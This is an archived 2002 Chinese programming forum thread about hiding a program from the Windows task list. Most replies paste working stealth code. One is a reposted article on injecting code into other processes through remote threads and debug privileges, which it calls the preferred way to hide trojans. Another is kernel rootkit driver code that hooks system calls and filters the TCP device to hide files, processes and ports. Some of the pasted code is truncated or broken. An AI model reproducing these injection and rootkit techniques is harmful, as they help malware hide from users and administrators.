程序隐藏（找遍论坛都没有找到，用GOOGLE都找不到）(100分)

高山鹰 · 2002-10-19

我想编一个后台监视程序，在WIN98中的任务列表不出现，用REGISTERSERVICEPROCESS函数可以 但是在WIN2000中出错，找不到该函数，有人能告诉我怎么处理，我的最低要求是在WIN98 下看不到在WIN2000中不出错就行。我找遍各大论坛都没有找到。 谁能给段程序就可以了[

]

王公子 · 2002-10-19

RegisterServiceProcess(GetCurrentProcessID,1);//从任务列表中隐藏 我也有此问题,帮你up

del520 · 2002-10-19

有趣，听听，提提。 你想做马木呀？

xyl999 · 2002-10-19

关注！

louhong · 2002-10-19

先声明下面的函数: function RegisterServiceProcess (ProcessID,RType

Word)

Word; stdcall;external 'KERNEL32.DLL'; 在Form的OnCreate加入： procedure TForm1.FormCreate(Sender: TObject); begin RegisterServiceProcess(GetCurrentProcessID,1); end; 在Form的OnDestroy加入： procedure TForm1.FormDestroy(Sender: TObject); begin RegisterServiceProcess(GetCurrentProcessID,0); end; 此法只能用在Win9x里,NT、2000、XP另有它法，但不是很好办。

wukw · 2002-10-21

VC的程序,不知道你有没有兴趣??? 我还没有试过，试验成功了告诉我一声，谢谢！         WinNT & Win2K下实现进程的完全隐藏 原创：antghazi9511（antghazi）   WinNT & Win2K下实现进程的完全隐藏 作者：AntGhazi 主页：antghazi.yeah.net   面对众多的计算机高手，考虑许久，终于还是决定出来献丑一下，文章内尽量使用最简洁易懂的词汇及例子来介绍，希望能够对一些初学与进阶者有所帮助。     关于进程的隐藏，98下的例子数不胜数。WinNT/Win2K下的隐藏方法，西祠的高手shotgun在去年的6月就已经在网上发布出实例《揭开木马的神秘面纱<四>》，我也多次拜读他的文章，对他的计算机水平及热心帮助朋友的作风十分敬佩。这里也可算是对shotgun的文章的补充与深入介绍吧，好了，闲话少说。 在WinNT下"真正隐藏进程"这一说法，可以讲是根本不可能实现，只要我们的程序是以进程内核的形式运行，都是不可能逃离CTRL+ALT+DEL的法眼。那么奇怪了，这岂不是与我们的标题《WinNT & Win2K下实现进程的完全隐藏》相矛盾吗？是的，实际上应该是：以非进程方式执行目标代码，而逃避进程查看器的检查，从而达到"进程隐藏"的目的。 我们这里用的，是在宿主进程中，以线程的方式执行我们的代码。实现起来非常简单。首先，我们先建立一个不执行任何语句的线程 DWORD stdcall ThreadProc(LPVOID *lpVoid){     return 0; } 然后，将线程代码拷备至宿主进程所能够执行的任何地方(即页面属性为PAGGE_EXECUTE_READWRITE)，如：共享内存影射区、宿主进程内。这里我们选择宿主进程，拷备的时侯，我们需要先在宿主进程中使用VirtualAllocEx函数申请一段内存，然后再使用WriteProcessMemory将线程体写入宿主进程中。 以上工作完成后，我们便可CreateRemoteThread函数激活其执行。下面给出一个完整的例子 //远程线程执行体 DWORD __stdcall ThreadProc (void *lpPara){   return 0; } int main(int argc, char* argv[]){   const DWORD THREADSIZE=1024*4;//暂定线程体大小为4K，实际上没这么大，稍后我将会介绍   DWORD byte_write;   //获得指定进程ID句柄，并设其权限为PROCESS_ALL_ACCESS,992是宿进程的ID号,获取ID号的方法这里我就不多讲了   HANDLE hWnd = ::OpenProcess (PROCESS_ALL_ACCESS,FALSE,992);   if(!hWnd)return 0;   void *pRemoteThread =::VirtualAllocEx(hWnd,0,THREADSIZE,MEM_COMMIT| MEM_RESERVE,PAGE_EXECUTE_READWRITE);//申请   if(!pRemoteThread)return 0;   if(!::WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,THREADSIZE,0))//写入进程      return 0;   //启动线程   HANDLE hThread = ::CreateRemoteThread (hWnd ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,NULL,0,&byte_write);   if(!hThread){ //还有内存分配未释放     return 0;   }   return 0; } 到这里，对于隐藏的方法就算告一段落，相信看过的朋友对这个思路有个非常明确的概念了吧。 在理解隐藏的方法后，我们着重开始写线程的执行部分了。如下： DWORD __stdcall ThreadProc(void *lpPara){   MessageBox(NULL,"hello","hello",0);   return 0; } 编译执行后，你会发现出现一个非法操作错误，为什么呢？在我们以段页式内存管理的win2K操作系统中，编译时会把所有的常量编译在PE文件的.data节中，而代码段则在.text中，所以，我们拷备到宿主进程中的代码是在.text中的代码，MessageBox(NULL,(char *)指针,p,0);所指向的地址是本进程的内存虚拟地址。而在宿主进程中是无法访问的。解决的方法很简单，按旧照搬的将"hello"也拷备到目标进程中，然后再引用。同理，MessageBox函数地址编译时，也是保存在.Import中，写过Win2k病毒的朋友都知道，所有常量与函数入口地址都需在代码段定义与得出，我们这里也与他有点类似。言归正传，同样情况我们也把函数的入口地址一起写入目标进程中。//先定义参数结构 typedef struct _RemotePara{//参数结构   char pMessageBox[12];   DWORD dwMessageBox; }RemotePara; //付值 RemotePara myRemotePara; ::ZeroMemory(&myRemotePara,sizeof(RemotePara)); HINSTANCE hUser32 = ::LoadLibrary ("user32.dll"); myRemotePara.dwMessageBox =(DWORD) ::GetProcAddress (hUser32 , "MessageBoxA"); strcat(myRemotePara.pMessageBox,"hello/0"); //写进目标进程 RemotePara *pRemotePara =(RemotePara *) ::VirtualAllocEx (hWnd ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);//注意申请空间时的页面保护属性 if(!pRemotePara)return 0; if(!::WriteProcessMemory (hWnd ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0; //启动进将参数传递进入 HANDLE hThread = ::CreateRemoteThread (hWnd ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write); if(!hThread){    return 0; }好了，就这么简单，下在给出一个弹出一个MessageBox的实例：// RemoteThread.cpp : Defines the entry point for the console application. // #include "stdafx.h" typedef struct _RemotePara{//参数结构    char pMessageBox[12];    DWORD dwMessageBox; }RemotePara; //远程线程 DWORD __stdcall ThreadProc (RemotePara *lpPara){    typedef int (__stdcall *MMessageBoxA)(HWND,LPCTSTR,LPCTSTR,DWORD);//定义MessageBox函数    MMessageBoxA myMessageBoxA;    myMessageBoxA =(MMessageBoxA) lpPara->dwMessageBox ;//得到函数入口地址    myMessageBoxA(NULL,lpPara->pMessageBox ,lpPara->pMessageBox,0);//call    return 0; } void EnableDebugPriv();//提升应用级调试权限 int main(int argc, char* argv[]){    const DWORD THREADSIZE=1024*4;    DWORD byte_write;    EnableDebugPriv();//提升权限    HANDLE hWnd = ::OpenProcess (PROCESS_ALL_ACCESS,FALSE,992);    if(!hWnd)return 0;    void *pRemoteThread =::VirtualAllocEx(hWnd,0,THREADSIZE,MEM_COMMIT| MEM_RESERVE,PAGE_EXECUTE_READWRITE);    if(!pRemoteThread)return 0;    if(!::WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,THREADSIZE,0))    return 0;    //再付值    RemotePara myRemotePara;    ::ZeroMemory(&myRemotePara,sizeof(RemotePara));    HINSTANCE hUser32 = ::LoadLibrary ("user32.dll");    myRemotePara.dwMessageBox =(DWORD) ::GetProcAddress (hUser32 , "MessageBoxA");    strcat(myRemotePara.pMessageBox,"hello/0");    //写进目标进程    RemotePara *pRemotePara =(RemotePara *) ::VirtualAllocEx (hWnd ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);//注意申请空间时的页面属性    if(!pRemotePara)return 0;    if(!::WriteProcessMemory (hWnd ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0;    //启动线程    HANDLE hThread = ::CreateRemoteThread (hWnd ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);    if(!hThread){       return 0;    } return 0; } //提升权限 void EnableDebugPriv( void ) { HANDLE hToken; LUID sedebugnameValue; TOKEN_PRIVILEGES tkp; if ( ! OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) ) return; if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) ){ CloseHandle( hToken ); return; } tkp.PrivilegeCount = 1; tkp.Privileges[0].Luid = sedebugnameValue; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) ) CloseHandle( hToken ); } 好了，程序编译执行后会在进程号为992的进程中创建一线程，弹出hello对话框。是不是非常简单呢！ 这里有几个地方需要注意的： 1、远程线程在宿主进程中申请空间时，空间大小的确定了是我一直无法解决的问题。我曾使用两个贴近一起的线程，以线程间的距离大小，并加上参数大小，作为申请空间时，仍然会出现非法操作，如下： static void StartThread (LPVOID *lpPara){    return ; } static void EndThread(LPVOID *lpPara){   return; } 然后使用DWORD dwLenght = (DWORD)((char *)&StartThread - (char *)&EndThread);//得到StartThread线程代码长度， dwLenght += sizeof(ThreadPara); 仍会出现非法操作让我很迷惑。在win2k中，线程的默认堆栈的页大小是4KB，这里我在为线程申请内存时，申请的大小暂时使用一个常数，始终为4KB的倍数，选取时尽量取大，在线程可成功运行后，再一点点改小。办法是笨了点，如这里的朋友有更好的方法，请不吝赐教。 2、什么时侯，什么参数是需要从外部传递进来的呢？我这里并没有一个十分有力的答案，我的理解是：PE文件中除了.text节以外的所有节，均需使用外部参数传递到线程中使用，如：.rsrc、.data、rdata等其他的15个节。在我们实际编写的过程中，初学者并不知道我们的代码会编译在什么地方，这个时侯，我们可以在运行的时侯ALT + 8（VC中快捷键）反编译过来，一般有lea eax p、push offset p等取地址语句，这个时侯，我们大都需要以参数传递进来。所以，大家在编写的时侯，一定要注意参数，因为线程的执行是在别的进程中，一个普通权限的应用程序是无法跨越进程来调试其他进程的。包括VC，也无法调试我们的远程线程，熟悉汇编的朋友，可用softice调试，这需要一定的功底。 3、权限，这一点很重要，shotgun在这方面也介绍得很清楚了，网上相关的文章也很多，我就不多说了。文中的EnableDebugPriv函数可使本进程在internet、winLogin、lsass等进程中创建线程。win2k的进程查看器无法将其杀除。 4、进程ID获方法较多，如：EnumProcesses、CreateToolhelp32Snapshot/Process32First/Process32Next、NtQuerySystemInformation等函数均可，为减少代码，例子中的进程ID是直接在进程查看器中得到的。最后，我们再回到shotgun的文章中，这时侯我们因已经非常清楚他的方法中为何会多出一个DLL文件了。远程线程的线程体本身就是LoadLibrary函数，即，线程的入口地址就是LoadLibrary的入口地址，这是系统Kernel32.dll中的函数，任何进程都可调用。线程中使用LoadLibrary函数将我们的DLL加载到系统空间内，线程一执行，我们的DLL就开始工作了。线程执行结束后，别忘了使用VirtualFreeEx将其申请的内存区释放。 两种方法一比较，很明显： 1、在使用DLL时，创建十分简单，也不需要太多的操作系统与内存操作知识，并可直接调试DLL文件。实现起来比较简单。 2、直接拷备到进程中的方法稍为复杂一点，一不小心，很容易出现非法操作。当然，也去掉那了个让人讨厌DLL文件。程序执行后，很难找到他的来源地，是除了病毒以外的木马隐藏的首选方法。这里我大量参考了nongmin.cn(农民)程序的源码，他的程序对我的帮助非常大。虽然未有谋面，但对他的计算机水平与作为十分的敬佩，并尊从他的作风，以后我所写的所有非商业软件或小代码，均以源码形式出现。这里写得有点乱，希望对大家能够有所帮助，愿与所有爱好计算机，从事计算机工作的朋友们共勉。AntGhazi/2002.1.14书 mailto:antghazi@163.net http://antghazi.yeah.net

wukw · 2002-10-21

再试试： 顺便问一下，如果对VC的代码不感兴趣，我以后来DFW就只看不贴了。  隐藏任意进程，目录/文件，注册表，端口 Author : sinister Email : sinister@whitecell.org HomePage: http://www.whitecell.org 查找进程，目录/文件，注册表等操作系统将最终调用 ZwQueryDirectoryFile，ZwQuerySystemInformation， ZwXXXValueKey 等函数。要想拦截这些函数达到隐藏目的，需先自己实现以上函数，并修改系统维护的一个 SYSCALL 表使之指向自己预先定义的函数。因 SYSCALL 表在用户层不可见，所以要写 DRIVE 在 RING 0 下 才可修改。关于如何修改已有文章详细介绍过，这里不在详述。（可以参见 sysinternals.com 或 WebCrazy 所 写的文章）。查找端口用的是 TDI 查询。TDI 导出了两个设备 /Device/Tcp 与 /Device/Udp。我们可以利 用设备过滤驱动的方法写一个 DRIVE 把这两个设备的所有 IRP 包接管过来进行处理后再传给下层驱动。以达到 隐藏任意端口的目的。上述提到的方法不是新东西，是在N年前就已经有的老技术。俺现在将它贴出来只不过为了 充实下版面，灌灌水罢了。高手们还是别看了。下面是我 DRIVE 中隐藏任意进程，目录/文件，端口代码片段。 （注册表操作在 RegMon 中写的很详细，这里就不列出了） Code: --------------------------------------------------------------------------------   typedef struct _FILETIME {     DWORD dwLowDateTime;     DWORD dwHighDateTime; } FILETIME; typedef struct _DirEntry {     DWORD dwLenToNext;     DWORD dwAttr;     FILETIME ftCreate, ftLastAccess, ftLastWrite;     DWORD dwUnknown[ 2 ];     DWORD dwFileSizeLow;     DWORD dwFileSizeHigh;     DWORD dwUnknown2[ 3 ];     WORD wNameLen;     WORD wUnknown;     DWORD dwUnknown3;     WORD wShortNameLen;     WCHAR swShortName[ 12 ];     WCHAR suName[ 1 ]; } DirEntry, *PDirEntry; struct _SYSTEM_THREADS {     LARGE_INTEGER        KernelTime;     LARGE_INTEGER        UserTime;     LARGE_INTEGER        CreateTime;     ULONG                WaitTime;     PVOID                StartAddress;     CLIENT_ID            ClientIs;     KPRIORITY            Priority;     KPRIORITY            BasePriority;     ULONG                ContextSwitchCount;     ULONG                ThreadState;     KWAIT_REASON         WaitReason; }; struct _SYSTEM_PROCESSES {     ULONG                NextEntryDelta;     ULONG                ThreadCount;     ULONG                Reserved[6];     LARGE_INTEGER        CreateTime;     LARGE_INTEGER        UserTime;     LARGE_INTEGER        KernelTime;     UNICODE_STRING       ProcessName;     KPRIORITY            BasePriority;     ULONG                ProcessId;     ULONG                InheritedFromProcessId;     ULONG                HandleCount;     ULONG                Reserved2[2];     VM_COUNTERS          VmCounters;     IO_COUNTERS          IoCounters;     struct _SYSTEM_THREADS Threads[1]; }; // 隐藏目录/文件 NTSTATUS HookZwQueryDirectoryFile(     IN HANDLE hFile,     IN HANDLE hEvent OPTIONAL,     IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,     IN PVOID IoApcContext OPTIONAL,     OUT PIO_STATUS_BLOCK pIoStatusBlock,     OUT PVOID FileInformationBuffer,     IN ULONG FileInformationBufferLength,     IN FILE_INFORMATION_CLASS FileInfoClass,     IN BOOLEAN bReturnOnlyOneEntry,     IN PUNICODE_STRING PathMask OPTIONAL,     IN BOOLEAN bRestartQuery) {     NTSTATUS             rc;     CHAR                 aProcessName[80];         ANSI_STRING          ansiFileName,ansiDirName;     UNICODE_STRING       uniFileName;     PP_DIR               ptr;     WCHAR                ParentDirectory[1024] = {0};     int                  BytesReturned;     PVOID                Object;             // 执行旧的ZwQueryDirectoryFile函数     rc = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile))(             hFile,                                         hEvent,             IoApcRoutine,             IoApcContext,             pIoStatusBlock,             FileInformationBuffer,             FileInformationBufferLength,             FileInfoClass,             bReturnOnlyOneEntry,             PathMask,             bRestartQuery);       if(NT_SUCCESS(rc))     {         PDirEntry p;         PDirEntry pLast;         BOOL bLastOne;         int found;                 p = (PDirEntry)FileInformationBuffer;    // 将查找出来结果赋给结构         pLast = NULL;                 do         {             bLastOne = !( p->dwLenToNext );             RtlInitUnicodeString(&uniFileName,p->suName);             RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE);             RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE);             RtlUpperString(&ansiFileName,&ansiDirName);             found=0;                         // 在链表中查找是否包含当前目录             for(ptr = list_head; ptr != NULL; ptr = ptr->next)             {                 if (ptr->flag != PTR_HIDEDIR) continue;                 if( RtlCompareMemory( ansiFileName.Buffer, ptr->name,strlen(ptr->name) ) == strlen(ptr->name))                 {                     found=1;                     break;                 }             }//end for             // 如果链表中包含当前目录，隐藏             if(found)             {                 if(bLastOne)                 {                     if(p == (PDirEntry)FileInformationBuffer )                     {                          rc = 0x80000006;    //隐藏                     }                     else                         pLast->dwLenToNext = 0;                     break;                 }                 else                 {                     int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer;                     int iLeft = (DWORD)FileInformationBufferLength - iPos - p->dwLenToNext;                     RtlCopyMemory( (PVOID)p, (PVOID)( (char *)p + p->dwLenToNext ), (DWORD)iLeft );                     continue;                 }             }             pLast = p;             p = (PDirEntry)((char *)p + p->dwLenToNext );         }while( !bLastOne );         RtlFreeAnsiString(&ansiDirName);           RtlFreeAnsiString(&ansiFileName);     }     return(rc); } // 隐藏进程 NTSTATUS HookZwQuerySystemInformation(     IN ULONG SystemInformationClass,     IN PVOID SystemInformation,     IN ULONG SystemInformationLength,     OUT PULONG ReturnLength) {     NTSTATUS rc;     ANSI_STRING process_name,process_uname,process_name1,process_name2;     BOOL    g_hide_proc = TRUE;     CHAR    aProcessName[80];     PP_DIR  ptr;                 int     found;     // 执行旧的ZwQuerySystemInformation函数     rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (         SystemInformationClass,         SystemInformation,         SystemInformationLength,         ReturnLength );     if(NT_SUCCESS(rc ))     {         if( g_hide_proc && (5 == SystemInformationClass))         {             // 将查找出来结果赋给结构             struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;             struct _SYSTEM_PROCESSES *prev = NULL;             // 遍历进程             while(curr)             {                   if((0 < process_name.Length) && (255 > process_name.Length))                 {                     found=0;                     // 遍历链表                     for (ptr=list_head;ptr!=NULL;ptr=ptr->next )                     {                           if (ptr->flag != PTR_HIDEPROC) continue ;                                                 if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0) { found =1; }                     }                     // 判断如果是隐藏进程名则覆盖掉此进程名                     while(found)                     {                         if(prev)                         {                             if(curr->NextEntryDelta)                             {                                 prev->NextEntryDelta += curr->NextEntryDelta;                             }                             else                             {                                 prev->NextEntryDelta = 0;                             } } else                         {                             if(curr->NextEntryDelta)                             {                                 (char *)SystemInformation += curr->NextEntryDelta;                             }                             else                             {                                 SystemInformation = NULL;                             }                         } if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta); else { curr = NULL;break; } // 遍历链表 found = 0; for (ptr=list_head;ptr!=NULL;ptr=ptr->next ) {   if (ptr->flag != PTR_HIDEPROC) continue ; if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0) { found = 1; } } } } if(curr != NULL) { prev = curr; if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta); else curr = NULL; } }         }     }     return(rc); } //隐藏端口      PDEVICE_OBJECT    m_TcpgetDevice;      PDEVICE_OBJECT    TcpDevice;      UNICODE_STRING    TcpDeviceName;      PDRIVER_OBJECT    TcpDriver;      PDEVICE_OBJECT    TcpgetDevice;      PDEVICE_OBJECT    FilterDevice      PDRIVER_DISPATCH  Empty;      NTSTATUS          status;      Empty = DriverObject->MajorFunction[IRP_MJ_CREATE];            RtlInitUnicodeString( &TcpDeviceName, L"/Device/Tcp");      //得到已有的设备指针      status = IoGetDeviceObjectPointer( &TcpDeviceName,                                         FILE_ALL_ACCESS,                        &FileObject,                                         &TcpDevice                                       );     if(!NT_SUCCESS(status))      {         DbgPrint("IoGetDeviceObjectPointer error!n");         return status;      }     DbgPrint("IoGetDeviceObjectPointer ok!n");         // 建立设备       status = IoCreateDevice( DriverObject,                              sizeof(DEVICE_EXTENSION),                              NULL,                              FILE_DEVICE_UNKNOWN,                              0,                              FALSE,                              &FilterDevice                           &nbsp

;     if(!NT_SUCCESS(status))     {         return status;     }     // 加入设备     TcpgetDevice = IoAttachDeviceToDeviceStack( FilterDevice, TcpDevice);     if(!TcpgetDevice)     {          IoDeleteDevice(FilterDevice); DbgPrint("IoAttachDeviceToDeviceStack error!n");          return STATUS_SUCCESS;     }     m_TcpgetDevice = TcpgetDevice;      // 加到过滤函数中处理    for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)    {        if((TcpDriver->MajorFunction!=Empty)&&(DriverObject->MajorFunction==Empty))        {            DriverObject->MajorFunction = PassThrough;          }    }    ObDereferenceObject(FileObject); NTSTATUS PassThrough( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp ) {        NTSTATUS                    status;        PIO_STACK_LOCATION          pIrpStack;        pIrpStack = IoGetCurrentIrpStackLocation( Irp );        //如是查询则完成 IRP        if ( pIrpStack->Parameters.DeviceIoControl.IoControlCode == QUERY_INFORMATION_EX)        {             //这里可以近一步判断某个端口             Irp->IoStatus.Status=STATUS_SUCCESS;             IoCompleteRequest(Irp,IO_NO_INCREMENT);             return STATUS_SUCCESS;        }       //复制当前 IRP       IoCopyCurrentIrpStackLocationToNext(Irp);         IoSetCompletionRoutine( Irp,                               GenericCompletion,                               NULL,                               TRUE,                      TRUE,                      TRUE                           //传递       return IoCallDriver( m_TcpgetDevice, Irp); }   --------------------------------------------------------------------------------   关于我们： WSS(Whitecell Security Systems)，一个非营利性民间技术组织，致力于各种系统安全技术的研究。坚持传统的hacker精神，追求技术的精纯 。 WSS 主页：http://www.whitecell.org/ WSS 论坛：http://www.whitecell.org/forum/

cornermoss · 2002-10-22

<<最低要求是在WIN98下看不到在WIN2000中不出错就行 >>不知道先判断操作系统是否是Win2K/XP/NT，然后是否调用函数，这样行吗？ ********************************** //判断操作系统 function TFuncs.OsIs:Integer; begin   case Win32Platform of     VER_PLATFORM_WIN32s: Result:=32;     VER_PLATFORM_WIN32_WINDOWS: Result:=98;     VER_PLATFORM_WIN32_NT: Result:=2000;     else Result:=0;   end; end; ********************************** 也有人说”使用编译开关判断当前系统版本“

sunroll · 2002-10-22

用REGISTERSERVICEPROCESS好象不可以，我遇到下面的情况：     我做了一个小程序，让它在win98启动时执行，控制系统，只有在此程序中输入了   正确的用户口令才能正常使用机器，但是，如果在此程序未完全启动时按热启动键   （alt+ctrl+del）,在任务栏中将它结束运行，有什么好办法吗？

高山鹰 · 2002-10-25

谢谢各位，我已经找到答案了，用显式函数调用方法可以解决，分数只好随便给了

wukw · 2002-10-25

请把答案贴出来啊！！！ 谢谢！

高山鹰 · 2002-10-31

先声明函数regservice:function(uthread:integer;utype:integer):integer;stdcall; 定义变量： var wlong:integer;     s1:string;     s2,s3,sbuf:array[0..300] of char;     i:integer;     osver:tosversioninfo;     tmp:tmemorystream;     max,count,step:integer; 调用的程序段[

][

]  //取得操作系统版本信息,若为win9x则注册为服务进程而隐身,nt下无此功能   osver.dwosversioninfosize:=sizeof(tosversioninfo);    if getversionex(osver)=true then    begin      if osver.dwplatformid<>ver_platform_win32_nt then        begin            libhandle:=loadlibrary('kernel32.dll');            if libhandle<>0 then            begin                 @regservice:=getprocaddress(libhandle, 'RegisterServiceProcess');                if @regservice=nil then                   showmessage('regservice');                regservice(0,1);//1=hide,0=show;               // RegisterServiceProcess(getcurrentprocessid,1);                freelibrary(libhandle);                          end;        end;    end;

高山鹰 · 2002-10-31

多人接受答案了。

程序隐藏（找遍论坛都没有找到，用GOOGLE都找不到）(100分)

高山鹰

Unregistered / Unconfirmed

王公子

Unregistered / Unconfirmed

del520

Unregistered / Unconfirmed

xyl999

Unregistered / Unconfirmed

louhong

Unregistered / Unconfirmed

wukw

Unregistered / Unconfirmed

wukw

Unregistered / Unconfirmed

cornermoss

Unregistered / Unconfirmed

sunroll

Unregistered / Unconfirmed

高山鹰

Unregistered / Unconfirmed

wukw

Unregistered / Unconfirmed

高山鹰

Unregistered / Unconfirmed

高山鹰

Unregistered / Unconfirmed

Similar threads